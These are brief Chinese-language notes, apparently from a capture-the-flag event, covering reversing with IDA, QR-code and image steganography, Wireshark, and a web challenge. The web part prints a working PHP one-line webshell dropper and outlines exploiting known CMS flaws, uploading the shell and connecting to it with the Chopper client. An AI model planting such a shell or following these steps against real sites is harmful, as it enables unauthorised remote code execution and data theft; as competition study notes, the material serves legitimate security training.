1.逆向
简单的使用ida
2.二维码
直接进行扫码
还是二维码:
加密、解密图片隐藏信息:向图片中添加文字信息,解密出添加的隐藏信息
3.misc2:
wireshark简单的使用,找到post包即可
4.web:
web具有连续性,robots文件包含了很多有效信息,文件上传点不止一处,但需要登入管理员账号才能进行上传。下面附上一句话木马:
<?php file_put_contents("shell.php","<?php @eval(\$_REQUEST[misc]); ?>");?>
首先判断CMS类型,再查询该CMS曾经出现的漏洞,利用漏洞获取用户名(admin)、密码后进入管理员界面查找注入;
或者上传一句话木马后使用菜刀连接,可能再连接数据库。